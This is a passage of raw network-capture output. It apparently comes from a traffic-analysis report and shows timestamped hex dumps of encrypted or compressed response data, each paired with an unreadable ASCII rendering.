                                                                                                                                                    2022-09-29 12:59:02 UTC5757INData Raw: 94 96 b0 87 1d 73 d4 48 99 36 11 15 fa 29 17 86 84 ca 21 8a 53 77 0a 39 e7 33 75 5a ff 4d 67 66 e1 95 3a 15 63 67 8f 8b c8 ae a6 61 b7 38 5e 29 f5 64 6c bb 74 9c de 3c 4f 5e aa 0b 04 59 c0 fd 90 00 65 f0 53 fe 84 d7 6a e8 82 8a bb 5b 04 9f 4b f7 fb 61 8f cf 5d 54 66 8d 84 c8 bd 50 f2 e0 7a cb 92 c3 8d 3c 48 36 d8 20 16 c0 54 2a cc cf eb bb e1 22 46 38 c4 42 54 14 24 d5 64 7c 0a ff 00 50 d6 cf 61 d1 6d 86 2d c3 f8 c0 41 03 f4 40 90 0f f3 cd 8d fa 98 55 54 2a 00 b4 63 f4 dc 9c e7 39 8f 3e e9 56 31 97 83 55 a2 8d b8 2d 17 93 98 da 23 04 93 1a dd c2 54 d1 6a 25 43 43 f0 ec 06 dc 01 f4 7e f8 9f 15 16 ed bf 58 ff 39 88 76 cd 98 9c a5 16 23 24 e9 c3 eb 58 3a a5 bb 83 49 2a 4f 10 99 63 c2 bf ca 95 89 17 52 42 06 3d 80 b7 5b e5 84 64 9e 71 62 17 3e 6b 95 db 5f b9
                                                                                                                                                    Data Ascii: sH6)!Sw93uZMgf:cga8^)dlt<O^YeSj[Ka]TfPz<H6 T*"F8BT$d|Pam-A@UT*c9>V1U-#Tj%CC~X9v#$X:I*OcRB=[dqb>k_
                                                                                                                                                    2022-09-29 12:59:02 UTC5773INData Raw: 7d 70 de 41 6c d6 1c 1d bf 04 38 6b 64 aa 18 a1 97 65 3a e8 b7 f6 c1 84 15 30 54 08 70 57 cc 7f 11 8b a4 5c d8 db 50 08 93 65 ab b3 49 f2 5d 7f fa d9 67 3c 2b f0 3e 21 42 24 8b ba d3 d6 95 4b 7b d1 1a 80 6a 45 0e 54 bb 48 e0 ea b9 3a 66 76 1a 46 d4 d9 b9 10 b1 ac 68 ab 9b 87 f6 ef c7 16 91 8e 24 fe 78 c4 dd e5 21 18 14 9b 7a 59 a9 10 a7 18 0d 46 e1 8b 24 10 06 ff 9a 17 34 bf 5a 26 2e 81 42 78 7c 71 a2 52 50 c3 4e 96 fd 40 db 45 c2 67 7c 47 23 9e a2 9e cf 4e 96 d5 ce c9 fd da 46 05 e6 0f f9 3e 6b dd c5 bb 48 86 1e 44 1c e6 03 17 8c 8d 87 4a c4 bb 61 cd cd a3 eb 38 cf 3a 79 4b b6 a4 3c 48 aa 0a 0c f1 e4 b9 ac d5 ec 32 44 73 7d 84 29 33 a6 77 13 4b 57 38 53 fa 69 80 19 02 ef fd de 78 c9 ed 0f 49 4b 6b ce bd b8 2d 1d de 8e 7c 1f b9 e8 b1 71 6a 19 18 5d 07 da
                                                                                                                                                    Data Ascii: }pAl8kde:0TpW\PeI]g<+>!B$K{jETH:fvFh$x!zYF$4Z&.Bx|qRPN@Eg|G#NF>kHDJa8:yK<H2Ds})3wKW8SixIKk-|qj]
                                                                                                                                                    2022-09-29 12:59:02 UTC5789INData Raw: 61 33 0b 29 a5 37 fe e9 b8 cd 31 1a 35 b3 39 1d de 65 fd ea 92 31 41 88 36 5c 41 b4 ec f7 9d ea 7c a1 07 20 f4 de fe 49 39 4f 7a 0b 28 65 77 72 80 69 c6 62 0d c5 75 e8 b1 a7 43 f6 30 f8 5e f6 33 b4 71 f5 ef 51 d8 57 f7 df 70 b0 3e f5 b2 69 2e 1f 7c bf cd e7 80 9c a9 77 f6 1c 37 78 ad 0d ee 38 2c 25 8c 64 b6 6d 1a d9 c9 c1 90 8f 24 7f a8 4f f3 fc e9 32 95 27 f4 ac 12 06 5f bf 2d 7c b1 58 d7 d5 7e 0f b0 e6 5f f0 7d 7a 9c 58 99 e8 ae ed 12 65 2b ae 76 c6 f0 23 62 6e 06 c2 aa 9c 4d cc e1 7b dc a4 35 d5 f2 39 8d b9 b9 ae 02 73 09 79 3a db 69 c0 8b 5d 80 31 a2 a0 45 b0 e2 54 9a 7c de 23 2b 13 0f a4 f6 91 2f e5 98 03 78 42 95 ea d5 e4 c5 1e c1 86 d5 a0 71 08 3a f7 cb 99 8d a3 b3 d0 b0 da aa 38 16 46 48 54 b1 33 19 08 03 26 af 9a 25 89 f9 c5 78 e4 d7 e8 7c 21 1f
                                                                                                                                                    Data Ascii: a3)7159e1A6\A| I9Oz(ewribuC0^3qQWp>i.|w7x8,%dm$O2'_-|X~_}zXe+v#bnM{59sy:i]1ET|#+/xBq:8FHT3&%x|!
                                                                                                                                                    2022-09-29 12:59:02 UTC5805INData Raw: 4c 0a e1 0e f2 c1 2e 91 d2 9f 69 62 5b 4b bf 6e 57 ee f9 8f a8 9a d4 cb e3 fd 17 3f df 43 22 af 46 5c 19 8d 47 1b 68 22 7c 06 c2 ad 1d 31 47 47 43 56 b4 0b 8d 38 f7 3d a9 f6 8f 91 d1 b7 55 6e 9e a2 14 55 f5 93 95 e1 cd d6 d3 4b 84 3c 9d 03 1e f9 97 a8 c9 2f 39 e2 9a 78 8a d0 41 2a e3 f5 5f 85 b7 80 bd 90 55 5a ed d7 21 f1 38 55 6d 03 9c 63 d6 67 79 67 53 7a 98 80 f8 e0 bf 3b f3 b6 2e 65 22 a8 26 15 eb 25 e8 1f 77 63 1a 74 34 be 80 09 36 6a b0 5b 24 1d 1f f3 89 7a c7 7b 72 0b 3e 0a 17 b2 43 7e 0b 58 43 7e d3 32 87 65 38 6f dc 81 a5 de 73 8b f3 e1 fc 20 f1 8d c2 0c 06 09 44 44 6c 79 e9 0d 85 7c e2 a4 ad c5 13 ad 5a dd 92 b8 66 a5 3b 2b 7f 97 30 99 4b 7e fd 7e d1 4b da 66 4b ad 43 88 21 04 7e 58 38 a2 c2 4b e0 67 fb 80 8b 2b 21 ef 17 5c 32 22 0b 6c b1 cb b2
                                                                                                                                                    Data Ascii: L.ib[KnW?C"F\Gh"|1GGCV8=UnUK</9xA*_UZ!8UmcgygSz;.e"&%wct46j[$z{r>C~XC~2e8os DDly|Zf;+0K~~KfKC!~X8Kg+!\2"l
                                                                                                                                                    2022-09-29 12:59:02 UTC5821INData Raw: 21 5f fb b0 6e 75 a1 db 27 ce 15 51 bf c4 39 e6 90 ef 48 7e 26 fe 18 64 d1 b3 67 04 8b de 60 6c da 84 42 2c 2d e5 d8 b1 36 b2 10 fc 18 e3 21 d8 e1 ee f2 f8 ad 2f ac a5 0a 74 42 21 ea e8 8b 32 a3 91 a2 3e e6 3a 8c 16 26 ae 75 61 3f 67 06 d1 d4 d6 66 6c 50 32 35 a1 5f 5c 9e 0c 6e e0 48 ed a6 c3 dc 78 da e6 3c cd f3 ed dd b4 db bd 04 3c 76 3b e3 47 9e a2 17 ae ef 33 be 3e b2 fe 6f bc 80 2c 5b ea 4c 26 fa 2b dd 71 09 e2 b7 c8 db 01 54 4d b0 86 5d 23 ed 6d 5b ff 9d bd fd e3 30 f4 a5 46 79 d9 da bc 93 6b 50 ea 18 50 b6 fd 28 7d f3 8b 37 f1 92 05 93 e1 d0 b6 0d 0d 8c b8 b6 d6 03 99 ad 82 60 9f 5e 8a 9e 7c 36 1f 3a b2 df ee 99 44 fb be e9 c9 e8 b7 1a 9b a4 05 54 30 b8 77 9a 69 a3 0c 76 f9 19 64 47 5c 51 ca 35 a8 2b 89 6a 9f 2b c1 be da 83 d5 5d fd 38 c6 38 1d c0
                                                                                                                                                    Data Ascii: !_nu'Q9H~&dg`lB,-6!/tB!2>:&ua?gflP25_\nHx<<v;G3>o,[L&+qTM]#m[0FykPP(}7`^|6:DT0wivdG\Q5+j+]88
                                                                                                                                                    2022-09-29 12:59:02 UTC5837INData Raw: b5 46 dd e1 f7 d2 d5 49 31 7a 8a 44 2a 8c c1 00 1b 62 54 f3 0b 22 9b c9 6b 7e 0b 5a 68 61 ce b8 aa 67 a4 d8 34 a8 e1 96 12 2f 0d 57 00 01 2d 81 42 db ef 04 fc 9d b6 a4 7b 28 5a 5f 7b 4d 01 4b 06 e4 60 d6 ba 29 11 89 09 29 f6 b8 d2 a4 b3 22 56 45 cb 7b cb 9c ef f9 7a ee e7 f3 51 27 58 cf e7 db c2 13 dc 41 13 53 fc 80 39 6c 3d 92 31 a7 36 3f 49 39 4e 25 c5 f5 39 67 d1 07 f6 b0 01 a8 9c 81 c9 1e 64 06 1c b9 0f 29 7a df 26 52 e8 97 fa c3 ca 3e 3b 65 cf 5a 34 68 99 f4 da 84 46 8c 75 3d 57 05 76 27 d7 c4 a6 64 40 b1 23 ad 33 2d 9c 3d 7c a8 cb a0 c3 32 b5 d6 61 3c fe 45 29 23 1d c3 65 38 34 34 26 94 7b 26 8b a4 1e b1 3a 9b da b2 af 3a 52 c7 cc a5 22 d6 ac cc 9a f9 4a 48 fe f0 aa bd 32 7b 12 be 89 b0 bb 3b 0c 2b 7a a8 f2 1a 04 8d a7 92 72 64 40 bb b7 37 cf b3 22
                                                                                                                                                    Data Ascii: FI1zD*bT"k~Zhag4/W-B{(Z_{MK`))"VE{zQ'XAS9l=16?I9N%9gd)z&R>;eZ4hFu=Wv'd@#3-=|2a<E)#e844&{&::R"JH2{;+zrd@7"
                                                                                                                                                    2022-09-29 12:59:02 UTC5847INData Raw: d2 97 9e d0 be af 9e 91 69 8c 19 35 b2 67 77 35 87 8b 9e 6d 61 9a f3 e9 f6 2b de f3 db a2 e0 f6 69 2d e3 b8 fd d7 c5 3f d9 98 6e ca 78 a9 97 4b 3a 60 80 34 de 23 c6 96 57 d5 03 82 34 17 8c 05 65 f4 b5 9d c2 e8 59 79 e7 f8 e1 1b 93 0b 82 78 20 b9 67 b7 2a 05 02 e5 f2 24 d7 a6 ea 52 d7 89 4f a5 50 a4 c9 f0 ea 38 01 51 e7 b2 fd 24 2b f2 5b 62 c9 5e f9 c7 47 52 bd 2c 07 e1 ba 7b 16 3d 3c 14 58 5f 69 49 50 a3 3b 2c 93 e9 0e c3 ba a7 24 d3 de 2d 00 bb b8 92 42 a1 d4 f7 a3 7f 24 10 93 d6 20 34 c3 9b 4e 53 f5 26 00 ca 59 8c d7 ff 82 7f 11 aa c0 18 04 2a 83 6c e2 93 16 7f 1f 13 8a 33 9a 19 9f 5f fc 1d cc 09 d6 fc 2b 7f eb be e8 9f ee 0a 1e c5 f0 16 5c 89 e9 70 f9 f1 f1 69 96 3b 8b 95 c1 dc 0c 8a 2d 22 aa e1 77 76 6f dc 52 20 4b aa 1c c1 b0 6f 80 05 d0 54 78 7b 01
                                                                                                                                                    Data Ascii: i5gw5ma+i-?nxK:`4#W4eYyx g*$ROP8Q$+[b^GR,{=<X_iIP;,$-B$ 4NS&Y*l3_+\pi;-"wvoR KoTx{
                                                                                                                                                    2022-09-29 12:59:02 UTC5863INData Raw: 89 09 27 e0 74 89 10 36 84 92 04 73 57 25 87 54 2e bf 0a f4 f4 96 db 02 9c 5d 5e 03 8f af 68 39 55 89 6d 92 04 4b d6 27 0e 2a 4e b2 3d fe 21 ee 97 7e bf 02 9a 05 e1 f5 d2 61 78 6f cf e6 86 df 4b 11 e2 a7 25 75 99 20 33 ef 93 db fa 93 56 89 ef 4b 4c 52 6a 4d 38 c1 6d 04 b1 0b 3d 7a a6 1a 5c 5b f6 2f cd 52 14 51 15 d3 78 58 a7 89 75 55 03 7b 51 a0 e0 c9 80 36 01 87 70 6d ba 7b 21 6e 53 af 6d 57 4c 1f 50 50 8f 0c 65 a4 2c 7c 64 c7 63 de ae 76 d8 96 e0 f9 94 0a 00 96 eb 84 00 a0 59 e1 4b d9 59 25 c5 78 5d a5 2d 1f b4 38 e0 7f 7b 7e 43 66 0b 3a e9 54 94 ef 27 d5 fe 9c b3 f5 ce 79 70 de c1 85 b6 bf 10 c4 63 ab 1f d0 38 45 d6 ea 2f df 70 0d 84 d8 1c 98 bb af 4d be 5c 3e 67 f2 55 43 a6 54 95 09 8d e2 88 8a 8e 33 14 21 47 f3 2a 4c 00 54 9b 12 da f2 d8 f5 76 76 f5
                                                                                                                                                    Data Ascii: 't6sW%T.]^h9UmK'*N=!~axoK%u 3VKLRjM8m=z\[/RQxXuU{Q6pm{!nSmWLPPe,|dcvYKY%x]-8{~Cf:T'ypc8E/pM\>gUCT3!G*LTvv
                                                                                                                                                    2022-09-29 12:59:02 UTC5879INData Raw: f6 e1 22 f0 f1 3b 13 fb 3b d3 9d 36 61 7a 66 8b 59 ac 6f 2b e4 80 e1 81 97 3e bd df 4f b1 f4 b2 7b c2 46 c3 d2 2c e9 82 16 11 e8 4c bc b3 7a 30 00 ac 75 31 bf 14 cb ed 11 8c c6 5d 75 ea 19 49 d4 18 64 70 ea 3c 03 cc 08 0a 87 63 cb 3b 4a 8c 34 2a e5 3f 59 b5 6c 91 13 66 b6 fc 86 6c 27 a8 ca e0 e2 3b d5 bb c9 59 df e0 31 d9 5c 1e 63 30 f2 dd a5 a3 7e 5e 82 44 c2 7a 1a fd bb 08 57 8f 7a dc c9 02 c1 11 00 8b 2a c5 d6 1b aa 00 bc 8c b4 f1 23 b3 bc 9b db c5 80 a4 db 69 22 75 02 4d dd 28 a8 ca 7b c1 0e ec c8 db 44 0e 9e 51 bd 15 98 b6 f7 61 41 16 19 7f 3d 77 5a a5 ef 6e 44 24 92 70 0a 06 9e b8 60 ae cb 98 6e 1a b8 da 4b 0a 7a f5 c7 4f 5b 3d 12 2e ce 0a 78 03 d2 f3 be 75 c5 a2 94 5d c9 46 f0 11 ff 32 39 6f 8c b0 85 bf c7 ff a1 22 55 25 19 89 d6 31 31 4f a8 c4 81
                                                                                                                                                    Data Ascii: ";;6azfYo+>O{F,Lz0u1]uIdp<c;J4*?Ylfl';Y1\c0~^DzWz*#i"uM({DQaA=wZnD$p`nKzO[=.xu]F29o"U%11O
                                                                                                                                                    2022-09-29 12:59:02 UTC5895INData Raw: d8 9a 04 bb 2e 42 5e db ac 70 42 fc c4 18 b0 c0 89 30 a7 73 a4 14 55 6e c2 f5 35 ea 7d a0 d7 31 96 c0 36 c3 88 7f ab 31 41 53 37 91 99 ba f5 31 41 f9 c2 1d 62 dc 76 88 d8 a7 23 d3 35 62 0c 59 15 78 d7 36 dd 6a de 3f c2 e3 c1 69 63 5e b7 47 e4 90 75 a5 92 e1 36 48 72 ce dc f2 dd 26 dd 81 25 59 13 eb 25 2f 3d c6 e4 8a 8a 25 92 aa f6 80 3a 3d 98 94 e4 69 d7 1b 3d 8e a5 ee d9 e2 dd dc 9f 61 13 48 59 79 52 db 5e 11 4b da 34 f1 07 c2 ac ce a7 c0 3b d8 0c 82 66 0a 48 9e 26 8d e7 d8 4f 19 63 f2 c0 43 ef 31 44 22 75 c1 2e f9 a7 59 53 5e de 9c 60 d4 1a 62 66 c0 8e bc 12 c2 b3 bb 61 b3 25 36 18 a5 0f ed d9 0c b9 63 f5 22 be 9f 7a 93 48 cc 7a 59 2b 0a 32 9c dd 91 f1 0c a4 da 36 74 2e 60 1a af 35 34 22 9d 43 db 60 5a c0 83 4a a6 7c b0 04 6a 19 b4 fe e4 1a 7b 1c d9 39
                                                                                                                                                    Data Ascii: .B^pB0sUn5}161AS71Abv#5bYx6j?ic^Gu6Hr&%Y%/=%:=i=aHYyR^K4;fH&OcC1D"u.YS^`bfa%6c"zHzY+26t.`54"C`ZJ|j{9
                                                                                                                                                    2022-09-29 12:59:02 UTC5911INData Raw: 65 0f a8 7c dc fa 2f 00 5f ed bb 9f aa f6 b8 a3 a5 f9 84 03 0a 74 62 91 2c a8 a7 72 a6 a8 f7 fc b4 a9 6d 6e 54 b0 59 6a b3 53 75 d3 a2 cd a7 80 10 c8 7d 8c 64 7f e3 9e 0e de 86 62 ba 57 be 71 01 b8 6c 9e fa 2c dc 74 31 2c 6a f3 04 ad d3 6b 26 01 69 f6 56 cc 76 2d 00 aa da 25 9a bc 94 40 77 f0 95 02 08 0f d8 10 a5 0f 19 41 b2 08 5d 7c 89 7c cf 2c 37 de 91 4b 71 f8 8c 11 fc 80 62 64 50 a7 f4 8c fd 24 84 8b 17 fa 03 59 aa d3 73 d9 2f 8f 7b 09 cb 08 33 d3 62 6b 44 9c d0 3a 50 8e 05 ea b3 ca 6f d4 c7 03 4e 55 0e a4 df ff 31 08 f0 02 12 15 8a a1 6f 06 1d 02 9e 7f de 8a e3 bc ab aa 29 96 29 4a 53 90 bb 8f 74 ea b1 fa d2 e4 d6 7c c9 e5 94 94 f6 34 0f a5 38 b1 2e 25 88 d2 69 bc 42 50 9e 8e fa 16 31 23 84 db 73 07 4b 65 13 29 d5 8c 8c c9 8b a1 88 0e d4 b8 ae 6a 5d
                                                                                                                                                    Data Ascii: e|/_tb,rmnTYjSu}dbWql,t1,jk&iVv-%@wA]||,7KqbdP$Ys/{3bkD:PoNU1o))JSt|48.%iBP1#sKe)j]
                                                                                                                                                    2022-09-29 12:59:02 UTC5927INData Raw: 0b 66 d2 ad 1b 50 ca 29 bf 3f 92 01 2f 79 d3 c3 01 64 08 48 e7 bb 7e 3b 06 3d c3 85 4f 84 37 e2 1a 10 d1 75 7a 3b 0c 92 22 1b 2e 50 ca 5b 98 ec 34 04 ec a7 2f 64 92 40 f0 a8 31 69 ca d1 7e 33 87 28 8c d7 b2 d7 4b dd 1f 89 29 04 cd c6 7b a0 3a c3 18 b2 14 26 62 7a 96 04 f6 ce 74 09 2f c6 8e 3c 5d 7c 50 3b 07 7d b6 22 51 4d e1 11 ec 02 28 55 6c 06 c0 d4 08 21 86 c6 f6 14 54 e2 af af 70 49 be 2e 13 5d f7 92 3d ff 7e 70 f5 e0 10 80 6f 56 c7 1a b1 6d ff eb 50 0e dc f4 c6 56 f9 7b 97 5b 5f 29 8e 3d e6 f6 10 17 80 99 2e 92 e4 7e 3b 2a 4e 0d 9e 2f 92 0e b6 e2 72 71 0e 8a 0c fc d3 88 5b ea 5f 18 ba 39 7b 20 29 e6 c8 a0 d0 2a 5a ae 35 bb 8e 9a 13 c6 d9 59 2a 7a 86 ea ab b0 75 77 f1 d8 96 5c 24 84 5a 08 2d 58 9e 98 4c ac 90 ae d1 f2 14 a1 17 30 28 f8 2c aa ff 43 ce
                                                                                                                                                    Data Ascii: fP)?/ydH~;=O7uz;".P[4/d@1i~3(K){:&bzt/<]|P;}"QM(Ul!TpI.]=~poVmPV{[_)=.~;*N/rq[_9{ )*Z5Y*zuw\$Z-XL0(,C
                                                                                                                                                    2022-09-29 12:59:02 UTC5943INData Raw: 4a 18 45 a4 88 d6 7b 34 15 fa 6d ea 31 bc 30 1e c1 57 59 a7 85 c3 e1 31 cb 22 5d 27 e4 cf 1e be c6 d7 20 3c cc 54 59 5a d7 58 22 e6 96 ff 3e 40 13 ca 2f 2b f5 45 01 b7 02 cb f8 f4 b6 44 71 27 94 ae 34 3e 48 e6 e8 74 2d 9e 68 2b 65 37 86 fb b0 bd 62 19 d4 62 31 ec 69 83 10 f3 51 87 75 d9 73 ea fd 76 10 4d bd f5 9a b1 16 73 98 d5 0a 0e 32 76 55 83 3f 9a 26 04 14 10 92 65 19 3f 73 ff b6 c5 2e c0 a9 43 fc 8e 66 8a a9 31 0b 0c 36 20 50 a3 7e 09 2f ff 54 ba ef c5 58 16 97 97 f3 4c e7 4b c3 ce 57 14 1d a2 f0 46 97 9d 49 a6 4c 87 1e 07 72 98 ea 97 8b 7a 9a 81 f6 da 35 3d 2d 84 ae 3d 3c 6d e0 d1 b7 5f 14 06 65 8a a6 2e 3e e4 ff 81 be 07 63 be 97 c6 6c 58 05 e5 d9 e8 2a 82 31 2e ff d3 71 8e 6e b9 ee e4 32 c0 db c9 80 4c de be de 20 51 85 db 7c d9 2b 80 6c 9e 5e 0c
                                                                                                                                                    Data Ascii: JE{4m10WY1"]' <TYZX">@/+EDq'4>Ht-h+e7bb1iQusvMs2vU?&e?s.Cf16 P~/TXLKWFILrz5=-=<m_e.>clX*1.qn2L Q|+l^
                                                                                                                                                    2022-09-29 12:59:02 UTC5959INData Raw: 91 dd d8 29 61 eb 7a c7 c9 a2 11 c2 b6 77 21 9b 80 5f dc ea c2 3e be c5 d0 79 a1 46 c1 97 20 c7 03 6f 14 cb 3a c9 ad 4e 98 bf 90 ce 21 4f eb 24 0f 3a 2e 8b 8d 5d 61 20 22 01 67 a8 d5 b2 d8 dc e5 db 3d 83 c6 b1 49 f1 62 fb 04 99 3e ee 11 2e cb 51 6a 28 8a 0b 68 52 9f 56 de 3a 8d 2e f4 d3 12 9e d1 76 e1 1e 89 9e b0 52 49 2e 42 82 a2 45 43 17 21 ff 98 a4 fe 82 42 ea 1e 69 2b 7b 97 41 1e 23 98 a9 70 3a 0b 9f 6e c0 c9 a8 5d d8 2f 53 42 6f 80 f9 3f e5 80 c8 27 3c f8 da d6 f9 72 15 14 f4 24 2f 40 27 43 ca a4 28 d8 d0 13 d4 15 02 e7 ad 3a a4 5a 5f a5 ed 04 f4 ba 36 ea 21 06 fc ec 80 79 59 18 c0 d6 63 46 48 36 65 7e 52 52 c4 d3 8f 8f d5 c7 c3 9d b3 10 c0 08 c2 ca ed 4f f6 76 83 39 c7 17 e1 f0 59 ca 63 64 67 47 6b 3c 74 2d 53 fa 21 cc 22 e6 a4 a0 c5 cd 67 af a7 07
                                                                                                                                                    Data Ascii: )azw!_>yF o:N!O$:.]a "g=Ib>.Qj(hRV:.vRI.BEC!Bi+{A#p:n]/SBo?'<r$/@'C(:Z_6!yYcFH6e~RROv9YcdgGk<t-S!"g
                                                                                                                                                    2022-09-29 12:59:02 UTC5975INData Raw: 21 80 ee 02 1d df d4 2e 3e 83 a7 f9 18 5d eb f5 b0 e9 c9 ba 55 39 e4 24 bd fc 9b 3f c7 16 d4 21 87 63 29 31 c6 2c 19 25 40 20 0c f3 ae fd c7 6d 0e 3d 86 6d 5f f5 8c d1 46 44 4c da a3 a9 07 f4 48 be 23 a1 14 d2 39 20 4a 0b 65 0f 95 85 b1 ce a2 ab bf d4 74 8c a0 a0 3e a4 f1 27 61 70 4e 42 7b 46 20 d3 5f e3 13 f2 2e 08 ff fc 13 94 67 0f 26 bb f6 cf 4e dc a0 f9 70 96 b6 60 dd 44 7e de 07 1d 18 d9 64 c7 a4 75 06 b7 b3 ba c5 55 ca 84 0b c4 35 e2 12 d3 9c f2 bf 3d 7d d2 37 bc 8d 6c dc 50 05 dc 76 2c 10 86 57 28 f2 d6 fc 3b 51 c4 ec 9d b5 ae 77 d0 77 b0 50 c8 57 9f 45 39 88 b6 53 ea 28 9a f2 31 d0 ed 2f e9 0c fe 81 2b 37 13 b7 31 5e 62 d1 67 c2 c7 12 72 79 ec bd 2c be de 72 e6 17 b9 92 d9 7b c7 de 48 f7 f4 5a cb 38 c0 d3 21 c3 19 03 f1 b4 df 2f 2d eb a3 4a 97 16
                                                                                                                                                    Data Ascii: !.>]U9$?!c)1,%@ m=m_FDLH#9 Jet>'apNB{F _.g&Np`D~duU5=}7lPv,W(;QwwPWE9S(1/+71^bgry,r{HZ8!/-J
                                                                                                                                                    2022-09-29 12:59:02 UTC5991INData Raw: b1 a4 7f cb 78 ce 05 4f 28 e6 76 cd 65 af 65 1a cd b0 0a 4f 2e 37 79 64 f7 1b 3f e1 b3 62 4d 74 48 48 34 18 be 4c eb 23 0b 2e 88 5f 4d 3b e3 72 9d fa 6e 00 d4 c9 ad 3d 7c c0 a8 98 51 3d 85 84 44 72 8a 93 fb 26 d2 8f 89 cc 36 9b 49 fe 69 b3 25 3f ef 02 b2 0a e0 1f 28 93 a0 ce c7 21 0f 6c 0e 96 6b 0b 75 21 67 d4 5d 23 95 90 00 08 6e 76 8a 5c 0c 46 95 de 3b a6 81 26 0c 27 5c 38 83 ea 9f 8c db 57 39 8b 11 cc d5 07 9b 3f f0 04 08 56 33 3d b3 b6 4b fa 24 cd 72 a5 05 81 c7 89 ee ef e2 6e e8 32 a5 18 97 28 12 c8 71 ca f0 d9 f9 52 5c 8a be ba 95 1c 0a 40 4d 75 65 15 d8 f2 77 7b 0c 49 73 96 7d d9 30 37 c3 bd 22 ff 8d 6e 31 53 a0 2b 16 89 ad 2c b7 16 e3 49 de a8 19 c5 d8 94 2c 8e 3b e9 c9 d9 c0 66 f7 21 56 24 40 3e 06 47 f2 74 a3 6f 99 d3 75 cd d0 14 8f 31 b6 a6 c0
                                                                                                                                                    Data Ascii: xO(veeO.7yd?bMtHH4L#._M;rn=|Q=Dr&6Ii%?(!lku!g]#nv\F;&'\8W9?V3=K$rn2(qR\@Muew{Is}07"n1S+,I,;f!V$@>Gtou1
                                                                                                                                                    2022-09-29 12:59:02 UTC6007INData Raw: bc 8f 78 56 9a 6a ca b2 4b 06 d4 34 00 1e fc a3 b2 70 d7 ff c6 09 eb 06 f0 57 b9 18 c6 2b 45 4a c2 e6 37 ab bc 63 82 3c 2b b1 ae 0b 53 23 c2 b5 a8 35 a2 4c 0f d5 d5 ee bf 7e a0 57 b1 9a d2 09 fe eb 4d b2 8b cb 21 64 b7 ff c5 23 67 0d c5 b0 c1 81 b4 51 d5 e7 e4 10 76 e1 ab 90 da ea 27 0e 90 ee e5 77 93 75 5e 13 52 87 8d 47 40 5d a1 9b 93 b7 d2 89 3c 61 3f cf 4e 64 05 c3 ea 87 bd a2 1f e7 ef 06 ce a1 a2 44 5b 13 9a e5 fe 0b b4 a7 2e ec 5e 2d 29 6e a9 32 e1 71 bb 6d 6c 6b 53 fc cf 3c 2f 1a 37 cc ba 51 a0 31 bb d8 a5 08 b5 98 0a 75 be 5c f3 cc 74 37 c3 5d ab 60 1d 8d 1b c8 63 59 0c f7 95 c5 e5 cb ac 36 07 8f 9b b2 15 d7 b7 8e 43 46 68 7b e4 f4 a1 fc 13 37 81 58 52 2b 46 22 27 d1 e5 a3 82 1c 3b 53 d3 d8 19 a7 33 92 f0 07 e2 a6 7c 47 fb 69 01 1d f2 cd 12 1c 44
                                                                                                                                                    Data Ascii: xVjK4pW+EJ7c<+S#5L~WM!d#gQv'wu^RG@]<a?NdD[.^-)n2qmlkS</7Q1u\t7]`cY6CFh{7XR+F"';S3|GiD
                                                                                                                                                    2022-09-29 12:59:02 UTC6023INData Raw: 79 41 17 a0 4d 14 4d bf b6 56 4c 9b 77 cf 1d bf 5c 4d a4 8a dd c8 82 11 91 34 55 f5 fb a4 c2 b2 51 00 66 ee 70 fb 98 44 f9 af 8f 67 6f 9c 22 f6 e3 ae ec d6 5c 5b 43 28 d9 13 d2 83 c4 1c 30 80 0d b0 c5 c3 29 19 47 1f d1 83 f6 18 0a 78 12 89 5f 60 d2 93 d0 f2 a0 46 cf 53 8c 55 10 45 d3 c2 54 1d d5 77 ab 5b f6 ee f2 8a 4c fc 6a 4a 71 ba 20 ad 8a 28 16 63 c5 c7 db 2a 8a a8 69 7b 97 77 98 66 99 1b 61 8c 14 86 a6 c2 4b 41 eb df ef 0e aa 39 2f a5 c3 87 86 ee 5a 53 7d b9 c6 16 9d 5f d3 62 51 fe ef 50 3f 8f 2e ac 5b bb 43 8e 1c 3b 98 96 fe 7a ec 37 d9 6d 83 65 54 6e d2 cf 05 be a7 05 ba cf 2f 93 f5 be b1 49 9a 1d ee d4 d5 39 d3 95 f1 99 17 fd a5 ba da d4 49 bf eb 0a b3 18 a3 28 20 a0 12 b0 af 2a 69 a7 54 92 fc 9d aa 22 6a ca a2 f5 96 d6 2b a5 43 6d 89 d3 0f 6b 25
                                                                                                                                                    Data Ascii: yAMMVLw\M4UQfpDgo"\[C(0)Gx_`FSUETw[LjJq (c*i{wfaKA9/ZS}_bQP?.[C;z7meTn/I9I( *iT"j+Cmk%
                                                                                                                                                    2022-09-29 12:59:02 UTC6039INData Raw: 7b 83 d6 fc 5a 8f d1 4c 96 cc c1 84 94 26 ef cf 23 79 b0 87 17 3f d4 e4 fa b0 ac 59 0d bd fc 35 58 51 87 ce 2b 05 8d 6e ae 8f 0a 88 c0 2f 40 96 14 65 ea 65 19 f4 b0 31 21 0a ea eb 97 e8 d0 b7 47 c8 ea c8 85 85 ee a8 06 2d bc 1e 28 57 d8 34 6e 74 b3 e3 67 d4 45 2b 1a 98 1f d9 1a b6 c1 2b 37 48 69 a3 16 65 56 be a3 3a 01 f9 fd 3d a8 44 18 1b 5f 96 3b b8 9f 75 9b 40 60 76 1d 83 a0 d1 ac e7 88 76 73 ce 35 68 25 6f 35 44 d7 dc 9b 4f c2 dc c4 2f 82 a2 b5 d5 e0 97 17 9f 82 c3 83 73 18 de db 2a a9 22 d0 77 26 58 1a 86 fd 7a 98 f4 55 70 e5 74 c0 e4 7f 89 04 9f 46 ef 17 eb 45 2c 18 1e 80 8f 41 2f 36 e0 dc e2 44 35 05 c8 7f c2 e4 4e 65 30 5c 7f 25 97 5f 45 2e 7a de 35 26 4b 7c 86 8d 74 87 f4 e7 b1 c0 c0 9b b9 2a 1e d5 75 34 d2 7f 0f c7 46 d3 d6 bd 29 34 38 28 33 96
                                                                                                                                                    Data Ascii: {ZL&#y?Y5XQ+n/@ee1!G-(W4ntgE++7HieV:=D_;u@`vvs5h%o5DO/s*"w&XzUptFE,A/6D5Ne0\%_E.z5&K|t*u4F)48(3
